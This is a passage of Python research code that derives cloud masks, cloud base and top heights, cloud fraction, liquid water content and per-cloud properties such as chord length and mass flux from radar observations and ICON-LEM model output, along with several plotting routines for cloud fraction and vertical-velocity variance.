cloudMask = f_calculateCloudMaskCloudnet(time, height, \
CategoryCN_res.transpose().astype(int))
#PLOTDONE1 = f_plotTest(cloudMask.transpose(), time, height, 'pre_call')
# calculating 30 min mean profiles of cloud fraction for observations
cloudFraction = f_calculateCloudFractionCloudnet(CategoryCN_res,\
yy, mm, dd, time, height)
Ze_lin = LWC
# calculating cloud base , cloud top and cloud thickness for all clouds and for pbl clouds
clouds, PBLclouds = f_calculateCloudBaseTopThickness(cloudMask, time, height, humanInfo)
# deriving lowest cloud base and corresponding cloud top for PBL clouds
CBarr = np.zeros(len(time))
CBarr.fill(np.nan)
CTarr = np.zeros(len(time))
CTarr.fill(np.nan)
iPBL = 0
for itime in range(len(time)):
if iPBL < len(PBLclouds.time.values):
if clouds.time.values[itime] == PBLclouds.time.values[iPBL]:
#print(iPBL)
CBarray = PBLclouds.cloudBase.values[iPBL, :]
if CBarray.size - np.count_nonzero(np.isnan(CBarray)) != 0:
minCB = np.nanmin(PBLclouds.cloudBase.values[iPBL, :])
CBarr[itime] = minCB
indexLevelMin = np.nanargmin(PBLclouds.cloudBase.values[iPBL, :])
CTarr[itime] = PBLclouds.cloudTop[iPBL, indexLevelMin]
else:
CBarr[itime] = np.nan
CTarr[itime] = np.nan
iPBL = iPBL + 1
# filtering Ze linear between cloud base and cloud top
for indT in range(len(time)):
ZE_lin_DF = pd.Series(Ze_lin[indT,:], index=height)
if (~np.isnan(CBarr[indT])):
mask_CB = (ZE_lin_DF.index < CBarr[indT])
ZE_lin_DF[mask_CB] = np.nan
else: # case in which cloud base is nan (excluded clouds or no clouds)
ZE_lin_DF[:] = np.nan
if (~np.isnan(CTarr[indT])):
mask_CT = (ZE_lin_DF.index > CTarr[indT])
ZE_lin_DF[mask_CT] = np.nan
else: # case in which cloud top is nan (excluded clouds or no clouds)
ZE_lin_DF[:] = np.nan
# copying values from the selection in the matrix
Ze_lin[indT,:] = ZE_lin_DF.values
# calculating LWC matrix adopting Frisch approach using Ze and LWP
deltaZ = 30. # range gate resolution of JOYRAD35 in meters
LWC = f_calculateLWCFrisch(Ze_lin, deltaZ, time, \
height, LWP)
if verboseFlag == 1:
print('cloud base, cloud top, cloud fraction and cloud mask calculated for observation')
print('filtering Ze linear values between cloud base and cloud top (PBL) for each time, \
removed values of Ze for clouds excluded from the data')
print('calculating LWC with Frisch approach from Ze for observations')
# check if input is from model
if device == 'iconlem':
stringData = 'iconlem'
Qi = iconLemData.groups['Temp_data'].variables['Qi'][:].copy()
Qc = iconLemData.groups['Temp_data'].variables['Qc'][:].copy()
# calculating cloud mask
cloudMask = f_cloudmask(time,height,Qc,Qi,QiThreshold,QcThreshold)
# calculating cloud base , cloud top and cloud thickness for all clouds and for pbl clouds
clouds, PBLclouds = f_calculateCloudBaseTopThickness(cloudMask, time, height, humanInfo)
# deriving lowest cloud base and corresponding cloud top for PBL clouds
CBarr = np.zeros(len(time))
CBarr.fill(np.nan)
CTarr = np.zeros(len(time))
CTarr.fill(np.nan)
iPBL = 0
for itime in range(len(time)):
if iPBL < len(PBLclouds.time.values):
if clouds.time.values[itime] == PBLclouds.time.values[iPBL]:
#print(iPBL)
CBarray = PBLclouds.cloudBase.values[iPBL, :]
if CBarray.size - np.count_nonzero(np.isnan(CBarray)) != 0:
minCB = np.nanmin(PBLclouds.cloudBase.values[iPBL, :])
CBarr[itime] = minCB
indexLevelMin = np.nanargmin(PBLclouds.cloudBase.values[iPBL, :])
CTarr[itime] = PBLclouds.cloudTop[iPBL, indexLevelMin]
else:
CBarr[itime] = np.nan
CTarr[itime] = np.nan
iPBL = iPBL + 1
# calculating 30 min mean profiles of cloud fraction for ICON-LEM
cloudFraction = f_calculateCloudFractionICON(Qi, Qc, \
yy, mm, dd, time, height, QiThreshold, QcThreshold)
LWC = Qc
if verboseFlag == 1:
print('cloud fraction and cloud mask calculated for model output')
# --------------------------------------------------------------------
# # starting common processing for obs and model data based on definitions of the variables given above
# --------------------------------------------------------------------
# calculation of cloud fraction
mean_CF_liquid = cloudFraction['LiquidCloudFraction']
mean_CF_ice = cloudFraction['IceCloudFraction']
mean_CF_tot = cloudFraction['TotalCloudFraction']
datetime_CF = cloudFraction['time']
# updraft speed at cloud base
UpdraftCB = np.zeros(len(time))
UpdraftCB.fill(np.nan)
for indT in range(len(time)):
if (~np.isnan(CBarr[indT])):
indCB = f_closest(height, CBarr[indT])
UpdraftCB[indT] = Wwind[indT,indCB]
# calculation of cloud duration, chord length, mass flux and mean LWP for each cloud unit identified
Dict_Clouds_arr = f_calculateCloudProperties(time, \
height, \
CBarr, \
CTarr, \
UpdraftCB, \
LWP, \
Hwind, \
Wwind, \
LWC)
duration = []
chordLength = []
massFlux = []
cloudLWP = []
cloudTimeStart = []
cloudTimeEnd = []
meanCT = []
meanCB = []
meanCloudThickness = []
meanUpdraftCB = []
Nclouds = len(Dict_Clouds_arr)
meanheightFromCB = np.zeros((Nclouds, len(height)))
cloudLWC = np.zeros((Nclouds, len(height)))
cloudLWC.fill(np.nan)
meanheightFromCB.fill(np.nan)
# building arrays in which each element correspond to a cloud
for iCloud in range(Nclouds):
duration.append(Dict_Clouds_arr[iCloud]['duration'].total_seconds())
chordLength.append(Dict_Clouds_arr[iCloud]['chordLength'])
massFlux.append(Dict_Clouds_arr[iCloud]['MassFlux'])
cloudLWP.append(Dict_Clouds_arr[iCloud]['meanLWP'])
cloudLWC[iCloud,:] = Dict_Clouds_arr[iCloud]['meanLWC']
#.append(Dict_Clouds_arr[iCloud]['meanLWC'])
cloudTimeStart.append(Dict_Clouds_arr[iCloud]['timeStart'])
cloudTimeEnd.append(Dict_Clouds_arr[iCloud]['timeEnd'])
#meanheightFromCB.append(Dict_Clouds_arr[iCloud]['meanheightFromCB'])
meanheightFromCB[iCloud,:] = Dict_Clouds_arr[iCloud]['meanheightFromCB']
meanCT.append(Dict_Clouds_arr[iCloud]['meanCT'])
meanCB.append(Dict_Clouds_arr[iCloud]['meanCB'])
meanCloudThickness.append(Dict_Clouds_arr[iCloud]['cloudThickness'])
meanUpdraftCB.append(Dict_Clouds_arr[iCloud]['meanUpdraftSpeedCB'])
if verboseFlag == 1:
print('cloud properties of duration, chord length, mass flux, mean cloud LWC and LWP calculated')
# output of a plot is keyword is selected:
if debuggingFlag == 1:
# plot of cloud mask, cloud base and cloud top normal and filtered for PBL
fig, ax = plt.subplots(figsize=(10,4))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
cax = ax.pcolormesh(time, height, cloudMask.transpose(), vmin=0, vmax=3, cmap=plt.cm.get_cmap("RdPu", 4))
ax.set_ylim(0,12000.) # limits of the y-axes
#ax.set_xlim(0,24) # limits of the x-axes
ax.set_title("cloud mask", fontsize=14)
ax.set_xlabel("time ", fontsize=12)
ax.set_ylabel("height [m]", fontsize=12)
plt.plot(time, CBarr, color='black', label='CB PBL')
plt.plot(time, CTarr, color='black', linestyle=':', label='CT PBL')
plt.legend()
cbar = fig.colorbar(cax, ticks=[0, 1, 2, 3], orientation='vertical')
cbar.ticks=([0,1,2,3])
cbar.ax.set_yticklabels(['no cloud','liquid','ice', 'mixed phase'])
cbar.set_label(label="cloud type",size=12)
cbar.ax.tick_params(labelsize=12)
cbar.aspect=80
plt.savefig(pathDebugFig+'cloudMask_'+stringData+'_'+date+'.png', format='png')
# define output dictionary of data: lenght of each element of the dictionary
# is given by the number of clouds found in the day
dictOut = {}
dictOut = {'cloudMask':cloudMask,
'timeSerie':time,
'liquidCloudFraction':mean_CF_liquid,
'iceCloudFraction':mean_CF_ice,
'totalCloudFraction':mean_CF_tot,
'datetimeCloudFraction':datetime_CF,
'heightCloudFraction':height,
'duration':duration,
'cloudLWP':cloudLWP,
'cloudLWC':cloudLWC,
'meanheightFromCB':meanheightFromCB,
'cloudMeanCB':meanCB,
'cloudMeanCT':meanCT,
'cloudTimeEnd':cloudTimeEnd,
'chordLength':chordLength,
'massFlux':massFlux,
'timeCloudStart':cloudTimeStart,
'timeCloudEnd':cloudTimeEnd,
'cloudUpdraftCB':meanUpdraftCB,
'Nclouds':Nclouds,
'LWPall':LWP,
'UpdraftCB_PBL':UpdraftCB,
}
return(dictOut, clouds, PBLclouds)
#---------------------------------------------------------------------------------
# date : 28.01.2019
# author: Claudia Acquistapace
# goal: function that identifies cloud continuous entities and derives ( based on definitions in Laureau et al, 2018, JAS)
# - cloud duration
# chord lenght
# Mass flux
# mean cloud base height
# vertical wind one range gate below cloud base
# mean LWP per cloud entity
#
# output: array of dictionaries: every dictionary correspond to an identified cloud, and contains the clodu properties
# -DictCloudPropArr
#--------------------------------------------------------------------------------
def f_calculateCloudProperties(datetime_ICON, \
height_ICON, \
CBarr, \
CTarr, \
UpdraftCB, \
LWP_ICON, \
Hwind_ICON, \
w_ICON, \
LWC):
"""
@ author: cacquist
@ date : November 2019
@ goal : this function was created to process in the same way model and obs data
It gets the inputs and calculates various cloud useful quantities, listed below.
locaql variables are called *_ICON because originally the code was developed only
for icon variables, but it applies to obs and model data
@ INPUT :
datetime_ICON: time array
height_ICON : height array
PBLclouds : xarray dataset containing PBl cloud bases, tops, and thicknesses
UpdraftCB : updraft velocity at cloud base time serie
LWP_ICON : LWP time serie
Hwind_ICON : Horizontal wind matrix (time, height)
w_ICON : vertical wind matrix (time, height)
LWC : liquid water content / Qc matrix (time, height)
@ OUTPUT:
one dictionary for each cloud unit. Each dictionary contains:
dictProp = {'timeStart':timeStart,
'indStart':indStart,
'timeEnd':timeEnd,
'indEnd':indEnd,
'meanLWP':meanLWP,
'meanLWC':meanLWC,
'meanheightFromCB':meanheightFromCB,
'meanCT':meanCT,
'stdLWP':stdLWP,
'meanCB':meanCB,
'stdCB':stdCB,
'WwindCB':WwindCloudBase,
'MassFlux':MassFlux,
'duration':duration,
'chordLength':chordLength }
"""
LWC[LWC == 0] = np.nan # setting to nans null values for better averaging
cloudStart = 0
Dict_Clouds_arr = []
# assigning starting and ending time of cloudy intervals considered continuous clouds
for itime in range(len(datetime_ICON)-1):
if (np.isnan(CBarr[itime]) == False) * (cloudStart == 0): #cb found, cloud not started yet
cloudStart = 1
timeStart = datetime_ICON[itime]
indStart = itime
# if cb found and cloudstart =1 loop does not do anything: this corresponds to the cloudy part
if ((np.isnan(CBarr[itime]) == True) * (cloudStart == 1)): # se Cb not found, \
#and cloudstart =1 (comes from a cloud), then it saves the previous time step as timeEnd \
# and puts to zero the cloud flag again, ready for a new cloud. Saves time indeces and values in the dictionary
# and sets timestart and end to nans
#print('sono qua')
timeEnd = datetime_ICON[itime-1]
indEnd = itime-1
cloudStart = 0
dict_cloud = {'timeStart':timeStart, 'indStart':indStart, 'timeEnd':timeEnd, 'indEnd':indEnd}
Dict_Clouds_arr.append(dict_cloud)
timeStart = np.nan
timeEnd = np.nan
# filtering LWC profiles below CB and above cloud top to nans
for itime in range(len(datetime_ICON)):
#if ((~np.isnan(minCB)) or (~np.isnan(maxCT))):
if ((~np.isnan(CBarr[itime])) or (~np.isnan(CTarr[itime]))):
#fig, ax = plt.subplots(figsize=(4,4))
#plt.plot(height_ICON, LWC[itime,:], label='before', color='red')
LWC_prof_DF = pd.Series(LWC[itime,:], index=height_ICON)
mask_CB = (LWC_prof_DF.index < CBarr[itime])
LWC_prof_DF.loc[mask_CB] = np.nan
mask_CT = (LWC_prof_DF.index > CTarr[itime])
LWC_prof_DF.loc[mask_CT] = np.nan
LWC[itime,:] = LWC_prof_DF.values
#plt.plot(height_ICON, LWC[itime,:], label='after', color='blue', linestyle=':')
#plt.axvline(x=CB_array_ICON[itime])
#plt.axvline(x=CT_array_ICON[itime])
#plt.xlim(0., 6000.)
#plt.savefig('/work/cacquist/HDCP2_S2/statistics/debug/'+str(itime))
else:
LWC[itime,:] = np.repeat(np.nan, len(height_ICON))
# calculating cloud duration, velocity below cloud base, mean cloud base height,\
# cloud chord lenght and corresponding mass flux as defined in (Lareau et al, 2018., JAS)
DictCloudPropArr = []
for iCloud in range(len(Dict_Clouds_arr)):
timeStart = Dict_Clouds_arr[iCloud]['timeStart']
timeEnd = Dict_Clouds_arr[iCloud]['timeEnd']
duration = timeEnd - timeStart
# calculating corresponding mean LWP, std LWP, mean CB height,
iTimeStart = Dict_Clouds_arr[iCloud]['indStart']
iTimeEnd = Dict_Clouds_arr[iCloud]['indEnd']
meanLWP = np.nanmedian(LWP_ICON[iTimeStart:iTimeEnd])
stdLWP = np.nanstd(LWP_ICON[iTimeStart:iTimeEnd])
meanLWC = np.nanmean(LWC[iTimeStart:iTimeEnd,:], axis=0)
meanUpdraftCBspeed = np.nanmedian(UpdraftCB[iTimeStart:iTimeEnd])
stdUpdraftCBspeed = np.nanstd(UpdraftCB[iTimeStart:iTimeEnd])
# finding max and min height where LWC array is non null: check the number of non nan elements
if (np.count_nonzero(~np.isnan(meanLWC)) != 0):
meanCB = np.nanmean(CBarr[iTimeStart:iTimeEnd])
meanCT = np.nanmean(CTarr[iTimeStart:iTimeEnd])
# calculating cloud properties
HwindCloudBase = np.nanmean(Hwind_ICON[iTimeStart:iTimeEnd, f_closest(height_ICON, meanCB)])
WwindCloudBase = np.nanmean(w_ICON[iTimeStart:iTimeEnd, f_closest(height_ICON, meanCB)+1])
chordLength = HwindCloudBase * duration.total_seconds()
meanheightFromCB = (height_ICON - np.repeat(meanCB, len(height_ICON)))/ \
(np.repeat(meanCT, len(height_ICON))- np.repeat(meanCB, len(height_ICON)))
MassFlux = WwindCloudBase * chordLength
cloudThickness = meanCT - meanCB
else:
if (len(CBarr[iTimeStart:iTimeEnd]) != 0):
meanCB = np.nanmean(CBarr[iTimeStart:iTimeEnd])
meanCT = np.nanmean(CTarr[iTimeStart:iTimeEnd])
HwindCloudBase = np.nanmean(Hwind_ICON[iTimeStart:iTimeEnd, f_closest(height_ICON, meanCB)])
WwindCloudBase = np.nanmean(w_ICON[iTimeStart:iTimeEnd, f_closest(height_ICON, meanCB)+1])
chordLength = HwindCloudBase * duration.total_seconds()
meanheightFromCB = (height_ICON - np.repeat(meanCB, len(height_ICON)))/ \
(np.repeat(meanCT, len(height_ICON))- np.repeat(meanCB, len(height_ICON)))
MassFlux = WwindCloudBase * chordLength
cloudThickness = meanCT - meanCB
else:
meanCB = np.nan
meanCT = np.nan
HwindCloudBase = np.nan
WwindCloudBase = np.nan
chordLength = np.nan
meanheightFromCB = np.repeat(np.nan, len(height_ICON))
MassFlux = np.nan
cloudThickness = np.nan
# storing data in dictionary array, each array is a cloudy unit
dictProp = {'timeStart':timeStart,
'indStart':indStart,
'timeEnd':timeEnd,
'indEnd':indEnd,
'meanLWP':meanLWP,
'meanLWC':meanLWC,
'meanheightFromCB':meanheightFromCB,
'meanCT':meanCT,
'stdLWP':stdLWP,
'meanCB':meanCB,
'WwindCB':WwindCloudBase,
'MassFlux':MassFlux,
'duration':duration,
'chordLength':chordLength,
'cloudThickness':cloudThickness,
'meanUpdraftSpeedCB':meanUpdraftCBspeed,
'stdUpdraftSpeedCB':stdUpdraftCBspeed,
}
DictCloudPropArr.append(dictProp)
return(DictCloudPropArr)
def f_calcMeanStdVarProfiles(field, time, height, date, yy, mm, dd, NprofilesOut, timeIncrement):
"""date : 02 aug 2019
# author : claudia Acquistapace
# contact: cacquist@meteo.uni-koeln.de
# goal : function to calculate mean profiles of a field over a given time period.
# input :
# - field: matrix to be averaged (it has to have dimensions (dim(time), dim(height)))
# - time
# - height
# - date
# - yy (integer for year)
# - mm (integer for month)
# - dd (integer for day)
# - NprofilesOut: number of averaged profiles to get as outputs: it depends on the interval of time chosed
# for the average Es( 48, timeIncrement= 30 min)
# - timeIncrement: interval of time chosed for the average (in minutes)
# output:
# dictionary of:
orderedDict['meanProfiles']
orderedDict['stdProfiles']
orderedDict['meanTime']
orderedDict['height']
orderedDict['date']
"""
# defining dataframes for calculating mean
field_DF = pd.DataFrame(field, index=time, columns=height)
#print(field_DF)
Profiles_var_DF = pd.DataFrame(np.zeros((len(height),NprofilesOut)), \
columns=np.arange(0,NprofilesOut), index=height)
Std_var_DF = pd.DataFrame(np.zeros((len(height),NprofilesOut)), \
columns=np.arange(0,NprofilesOut), index=height)
import collections
deltaT = datetime.timedelta(minutes=timeIncrement)
indInt = 0
datetime_out = []
for itime in range(0,NprofilesOut):
if indInt == 0:
HourInf = datetime.datetime(int(yy), int(mm), int(dd), 0, 0, 0)
else:
HourInf = HourInf + deltaT
HourSup = HourInf + deltaT
datetime_out.append(HourInf)
indInt = indInt + 1
field_sliced_t = field_DF.loc[(field_DF.index < HourSup) * (field_DF.index >= HourInf),:]
field_mean = field_sliced_t.mean(axis=0, skipna=True)
field_std = field_sliced_t.std(axis=0, skipna=True)
#print(field_mean)
Profiles_var_DF.loc[:,indInt] = field_mean
Std_var_DF.loc[:,indInt] = field_std
orderedDict = collections.OrderedDict()
orderedDict['meanProfiles'] = Profiles_var_DF.values
orderedDict['stdProfiles'] = Std_var_DF.values
orderedDict['meanTime'] = datetime_out
orderedDict['height'] = height
orderedDict['date'] = date
return(orderedDict)
def f_plotCloudFraction(datetime_CF, height, pathFig, CFmean_mod, CFmean_obs, \
CFmeanLiquid_mod, CFmeanLiquid_obs, CFmeanIce_mod, CFmeanIce_obs):
import matplotlib as mpl
import matplotlib.dates as mdates
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmean_mod.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction icon-lem - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_tot_wholeDataset_mod.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmean_obs.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction obs - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_tot_wholeDataset_obs.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanLiquid_mod.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction icon-lem - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_liq_wholeDataset_mod.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanLiquid_obs.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction obs - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_liq_wholeDataset_obs.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanIce_mod.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction icon-lem - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_ice_wholeDataset_mod.png', format='png')
fig, ax = plt.subplots(figsize=(12,6))
ax.xaxis.set_major_formatter(mdates.DateFormatter("%H:%M"))
ax.xaxis.set_minor_formatter(mdates.DateFormatter("%H:%M"))
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
ax.xaxis_date()
label_size = 16
mpl.rcParams['xtick.labelsize'] = label_size
mpl.rcParams['ytick.labelsize'] = label_size
cax1 = ax.pcolormesh(datetime_CF, height, CFmeanIce_obs.transpose(), vmin=0., vmax=0.4, cmap='BuPu')
ax.set_ylim(400.,4000.) # limits of the y-axe
ax.set_xlim() # limits of the x-axes
ax.set_title("cloud fraction obs - JOYCE", fontsize=16)
ax.set_xlabel("time [hh:mm]", fontsize=16)
ax.set_ylabel("height [m]", fontsize=16)
#plt.plot(time_ICON, CT_array, color='black', label='cloud top')
#plt.plot(time_ICON, CB_array, color='black',label='cloud base')
plt.legend(loc='upper left')
cbar = fig.colorbar(cax1, orientation='vertical')
#cbar.ticks=([0,1,2,3])
#cbar.ax.set_yticklabels(['no cloud','liquid','ice','mixed phase'])
cbar.set_label(label="cloud fraction ",size=14)
cbar.ax.tick_params(labelsize=14)
cbar.aspect=80
fig.tight_layout()
plt.savefig(pathFig+'cloudFraction_ice_wholeDataset_obs.png', format='png')
def f_convertPressureToHeight(P,T):
# pressure in Kpascal
# T in Kelvin
import math
P0 = 101.325 # Kpa
pippo = P/P0
listLog = []
for ind in range(len(P)):
listLog.append(np.log10(pippo[ind]))
g = 9.807 # m/s^2
M = 0.02896 # Kg/mol
R = 8.3143 # Nm/mol K
h = - (R*T)*listLog/(M*g)
return(h)
def f_plotVarianceWSingleDays(date,varWmean_obs,varWmean_mod, varWstd_obs, \
varWstd_mod,indHourPlotStart, height, pathFig):
Nrows = 2
Ncols = 5
Nplots = Nrows*Ncols+1
# ---- plotting hourly profiles of variance of vertical velocity during the day
fig, ax = plt.subplots(nrows=Nrows, ncols=Ncols, figsize=(14,10))
#matplotlib.rcParams['savefig.dpi'] = 300
plt.gcf().subplots_adjust(bottom=0.15)
fig.tight_layout()
ymax = 3000.
ymin = 107.
xmax = 1.5
fontSizeTitle = 16
fontSizeX = 15
fontSizeY = 15
#timeTitles = [']
for indPlot in range(1, Nplots):
ax = plt.subplot(2,5,indPlot)
ax.spines["top"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
#ax.text(1.8, ymax-200., 'a)', fontsize=15)
matplotlib.rc('xtick', labelsize=15) # sets dimension of ticks in the plots
matplotlib.rc('ytick', labelsize=15) # sets dimension of ticks in the plots
plt.plot(varWmean_obs[:,indHourPlotStart], height, label='obs', color='black')
#plt.errorbar(varWmean_obs[:,8], height, xerr=varWstd_obs[:,8], color='black')
plt.plot(varWmean_mod[:,indHourPlotStart], height, label='ICON', color='red')
#plt.errorbar(varWmean_mod[:,8], height, xerr=varWstd_mod[:,8], color='red')
y1 = varWmean_obs[:,indHourPlotStart]-varWstd_obs[:,indHourPlotStart]
y2 = varWmean_obs[:,indHourPlotStart]+varWstd_obs[:,indHourPlotStart]
plt.fill_betweenx(height, y1, y2, where=y2> y1, facecolor='black', alpha=0.2)
y1 = varWmean_mod[:,indHourPlotStart]-varWstd_mod[:,indHourPlotStart]
y2 = varWmean_mod[:,indHourPlotStart]+varWstd_mod[:,indHourPlotStart]
plt.fill_betweenx(height, y1, y2, where=y2> y1, facecolor='red', alpha=0.2)
plt.legend(loc='upper right', fontsize=14)
plt.ylim(ymin,ymax)
plt.xlim(0.,xmax)
#plt.title('8:00 UTC', fontsize=fontSizeTitle)
plt.xlabel('var(w) [m/s]', fontsize=fontSizeX)
plt.ylabel('height [m]', fontsize=fontSizeY)
plt.tight_layout()
indHourPlotStart = indHourPlotStart+1
plt.savefig(pathFig+'varW_Profiles_diurnal_cycle_'+date+'.png', format='png')
# finding how many radiosondes are launched during the selected day:
def f_reshapeRadiosondes(new_dict):
#from myFunctions import f_convertPressureToHeight
P_radios_obs = []
T_radios_obs = []
theta_v_radios_obs = []
RH_radios_obs = []
height_radios_obs = []
time_radios_obs = []
lengthRadiosonde = []
lcl_radios_obs = []
ccl_radios_obs = []
lts_radios_obs = []
pblHeight_radios_obs = []
Nsoundings = len(new_dict[0])
for indSoundings in range(Nsoundings):
P_radios_obs.append(new_dict[0][indSoundings]['P']/10.)
T_radios_obs.append(new_dict[0][indSoundings]['T'])
theta_v_radios_obs.append(new_dict[0][indSoundings]['theta_v'])
RH_radios_obs.append(new_dict[0][indSoundings]['RH'])
#height_radios_obs.append(f_convertPressureToHeight(new_dict[0][indSoundings]['P']/10.,new_dict[0][indSoundings]['T']))
height_radios_obs.append(new_dict[0][indSoundings]['height'])
time_radios_obs.append(new_dict[0][indSoundings]['time'])
lengthRadiosonde.append(len(new_dict[0][indSoundings]['P']))
lcl_radios_obs.append(new_dict[0][indSoundings]['z_lcl'])
ccl_radios_obs.append(new_dict[0][indSoundings]['z_ccl'])
lts_radios_obs.append(new_dict[0][indSoundings]['LTS'])
pblHeight_radios_obs.append(new_dict[0][indSoundings]['PBLheight'])
# find minimum length of radiosondes
P_resized = []
T_resized = []
theta_v_resized = []
T_resized = []
RH_resized = []
height_resized = []
index_min = np.argmin(lengthRadiosonde)
lenghtMin = lengthRadiosonde[index_min]
for indSoundings in range(Nsoundings):
if indSoundings == index_min:
P_resized.append(P_radios_obs[indSoundings])
T_resized.append(T_radios_obs[indSoundings])
